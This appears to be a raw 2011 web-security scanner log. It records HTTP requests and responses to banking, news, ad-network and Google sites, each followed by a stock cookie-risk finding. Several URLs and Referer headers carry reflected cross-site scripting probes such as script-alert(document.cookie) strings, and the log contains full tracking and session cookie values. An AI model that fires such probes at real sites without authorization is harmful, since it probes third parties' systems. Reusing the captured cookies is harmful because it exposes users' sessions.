GET /internetBanking/en_us/info/ContactUsOut.jsp HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 14537 Set-Cookie: JSESSIONIDRIB09=0000ow2BUtOGja-8V-F7CZsYAu6:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /planning/investments.action HTTP/1.1 Host: www6.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /j.ad?site=wareseekercom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=728x90|468x60&p=16284953&a=1&flashVer=10&ver=1.20¢er=1&noAd=1&url=http%3A%2F%2Fsearch.wareseeker.com%2Fip-boardc8b75%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E47d05c4592a%2F&rurl=http%3A%2F%2Fburp%2Fshow%2F30&f=0&rnd=16284848 HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=arn9a2NZaiMt6memKmHwxrdUs3tYbQRKAXpu2WGR5OjVZdBuEFn93sv7X8ZalwCuq7F0QFYFP3dkBSfkBxAXNnEbfxVOGZbsNxBYCqwmLZbm12GZcXljw7f3HikS9n1bOhCZaj5F8OTFsyVTkN7ZcNnRH2BBBlPyXJhFNDjgcJVvgaVG11CndFwGrWSEZc2naDJGDqftHQnmOHDvd3ePbOL6FaZdDGPg1Lmnn0J9OYX6Zbhbbv4GfpndrHVmW0s1qVrOtS6IP3EdwCpNAPNHMTens1QnwfVYFZb9HSyoPpMngmEQARRrTQDIAvXR3FQ3SYbdA8SQHiZbodgZap2C6ZaZamQrMS1cCcKUHYxod4r4Zb1YydwXbNmyf51VTTd7RQoZd7rH6AYyNUaywojPuhZcvhp
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /www/delivery/ajs.php HTTP/1.1 Host: ad.thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _OACBLOCK[1930]=1296696352; OAID=308f74733f72a0ba99b5c2e36e2aaec4; __qca=P0-629275191-1296696399668; OAVARS[default]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%222187%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22138%22%3Bs%3A6%3A%22oadest%22%3Bs%3A0%3A%22%22%3B%7D; _OASCCAP[1930]=1;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /www/delivery/al.php HTTP/1.1 Host: ad.thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _OACBLOCK[1930]=1296696352; OAID=308f74733f72a0ba99b5c2e36e2aaec4; __qca=P0-629275191-1296696399668; OAVARS[default]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%222187%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22138%22%3Bs%3A6%3A%22oadest%22%3Bs%3A0%3A%22%22%3B%7D; _OASCCAP[1930]=1;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /www/delivery/avw.php HTTP/1.1 Host: ad.thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _OACBLOCK[1930]=1296696352; OAID=308f74733f72a0ba99b5c2e36e2aaec4; __qca=P0-629275191-1296696399668; OAVARS[default]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%222187%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22138%22%3Bs%3A6%3A%22oadest%22%3Bs%3A0%3A%22%22%3B%7D; _OASCCAP[1930]=1;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /www/delivery/ck.php HTTP/1.1 Host: ad.thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _OACBLOCK[1930]=1296696352; OAID=308f74733f72a0ba99b5c2e36e2aaec4; __qca=P0-629275191-1296696399668; OAVARS[default]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%222187%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22138%22%3Bs%3A6%3A%22oadest%22%3Bs%3A0%3A%22%22%3B%7D; _OASCCAP[1930]=1;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /www/delivery/lg.php?bannerid=6337&campaignid=1930&zoneid=113&OACBLOCK=345600&OASCCAP=1&loc=http%3A%2F%2Fthehill.com%2Fblogs%2Fe2-wire%2F677-e2-wire650aa%27%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E2295b33377e%2F137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more&cb=def1805d3d HTTP/1.1 Host: ad.thehill.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel?id=971555&t=2 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1791096;type=citi08ft;cat=homechar;ord=1;num=7738084758166.224? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL"; ih="b!!!!?!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0"; vuday1=_UO8P5_x-h!>[UWm5D)f; bh="b!!!#u!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-G2!!!!#<lEa6!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!(<lEIR!#MTF!!!!(<lEIR!#MTH!!!!(<lEIR!#MTI!!!!(<lEIR!#MTJ!!!!(<lEIR!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!$<lEIR!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!(<lEIR!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#[L>!!!!#<lEa3!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aCq!!!!#<lEa2!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#mP5!!!!#<lEa6!#mP6!!!!#<lEa6!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p]T!!!!$<kL2n"
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 21:59:54 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT Set-Cookie: bh="b!!!#v!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-G2!!!!#<lEa6!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!(<lEIR!#MTF!!!!(<lEIR!#MTH!!!!(<lEIR!#MTI!!!!(<lEIR!#MTJ!!!!(<lEIR!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!$<lEIR!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!(<lEIR!#UL(!!!!#<lHkj!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#[L>!!!!#<lEa3!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aCq!!!!#<lEa2!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#mP5!!!!#<lEa6!#mP6!!!!#<lEa6!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p]T!!!!$<kL2n"; path=/; expires=Fri, 01-Feb-2013 21:59:54 GMT Cache-Control: no-store Last-Modified: Wed, 02 Feb 2011 21:59:54 GMT Pragma: no-cache Content-Length: 43 Content-Type: image/gif Age: 0 Proxy-Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /adserver/vdi/762701?d=D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1 Host: ads.adbrite.com Proxy-Connection: keep-alive Referer: http://www.arbornetworks.com/report Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@a@4d49757a@www.ehow.com"
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Content-Type: image/gif Date: Wed, 02 Feb 2011 23:36:07 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC" Server: Apache-Coyote/1.1 Set-Cookie: vsd="0@1@4d49ea68@www.arbornetworks.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/ Content-Length: 42
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /select/Login?sourceid=awo&subid=us-en-et-symh&medium=link&hl=en HTTP/1.1 Host: adwords.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/track.php?visitorId=7432e15fddd3a34a2d79b00lmU2qECVV&tracking=F&url=H_www.invisionpower.com%2F%2Fproducts%2Fboard%2Ffeatures%2F&referrer=H_burp%2Fshow%2F38&getParams=%3F95e51--%253E%253Ca%253E1fddadebe75%3D1&anchor=&cookies= HTTP/1.1 Host: affiliate.invisionpower.com Proxy-Connection: keep-alive Referer: http://www.invisionpower.com/products/board/features/?95e51--%3E%3Ca%3E1fddadebe75=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=61175156.1296696677.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/38; __utma=61175156.1901611536.1296685558.1296685558.1296696677.2; __utmc=61175156; __utmb=61175156.1.10.1296696677
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:30:40 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 X-Powered-By: PHP/5.2.9 P3P: CP="NOI NID ADMa DEVa PSAa OUR BUS ONL UNI COM STA OTC" Set-Cookie: PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; expires=Sun, 31-Jan-2021 01:30:40 GMT; path=/; domain=.invisionpower.com Content-Length: 0 Content-Type: application/x-javascript
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /api/ping?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2F&subId=d59e71895dde9e0dbe7525217bd974&v=1&jsonp=vglnk_jsonp_12966855687740 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: blogsearch.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bkshp HTTP/1.1 Host: books.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:08:19 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=109a9aeaece08aed:TM=1296691699:LM=1296691699:S=sEECQby9jva9KsA1; expires=Sat, 02-Feb-2013 00:08:19 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: OFE/0.1 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /books HTTP/1.1 Host: books.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:08:18 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=75899bb590a713b6:TM=1296691698:LM=1296691698:S=LGIgDlcm48-CMNO0; expires=Sat, 02-Feb-2013 00:08:18 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: OFE/0.1 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2171139&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; 